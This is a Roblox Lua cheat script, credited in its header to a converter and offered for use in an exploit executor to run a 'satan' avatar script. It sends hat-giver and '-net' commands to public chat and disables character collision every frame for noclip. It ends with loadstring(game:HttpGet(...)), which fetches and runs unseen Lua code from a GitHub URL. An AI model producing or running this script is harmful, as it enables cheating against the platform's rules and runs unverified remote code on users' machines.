--[[
fe satan converted by maxilito

https://www.roblox.com/catalog/10775031176/The-Pogo
https://www.roblox.com/catalog/12103236257/AO-Surfboard
https://www.roblox.com/catalog/9867481700/Le-Rouge-Cross-body-Bag-1-0
https://www.roblox.com/catalog/9867487176/Le-Rouge-Cross-body-Bag-3-0
https://www.roblox.com/catalog/9350274205/Vans-Black-White-Checkerboard-Umbrella
https://www.roblox.com/catalog/2493590711/Knights-of-Redcliff-Paladin-Helmet
https://www.roblox.com/catalog/9402600266/Sketched-white-and-magenta-5G-wings
https://www.roblox.com/catalog/2309346267/Classic-PC-Hat

-gh 10775031176, 12103236257, 9867481700, 9867487176, 9350274205, 2493590711, 9350274205, 9402600266, 2309346267
--]]

--this code below will give you the required hats instantly so you doesn't need to wear any hats



local TextChatService = game:GetService("TextChatService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local function SendChatMessage(message)
    if TextChatService.ChatVersion == Enum.ChatVersion.TextChatService then
        local textChannel = TextChatService.TextChannels:FindFirstChild("RBXGeneral")
        if textChannel then
            textChannel:SendAsync(message)
        else
            warn("RBXGeneral channel not found!")
        end
    else
        local sayMessageRequest = ReplicatedStorage:FindFirstChild("DefaultChatSystemChatEvents"):FindFirstChild("SayMessageRequest")
        if sayMessageRequest then
            sayMessageRequest:FireServer(message, "All")
        else
            warn("Legacy chat system not found!")
        end
    end
end

local customMessage = "-gh 10775031176, 12103236257, 9867481700, 9867487176, 9350274205, 2493590711, 9350274205, 9402600266, 2309346267"
local netMessage = "-net"


SendChatMessage(customMessage)
wait(2.1)

local player = game:GetService("Players").LocalPlayer
game:GetService("RunService").RenderStepped:Connect(function()
	if player.Character then
		for i,v in pairs(player.Character:GetDescendants()) do
			if v:IsA("BasePart") then
				v.CanCollide = false
			end
		end 
	end
end)
wait(1.5)
task.delay(5.6, function()
SendChatMessage(netMessage)
end)

loadstring(game:HttpGet("https://github.com/Minh1234ngudot/-/raw/refs/heads/main/Access/Santa%20Sigma.luau"))()
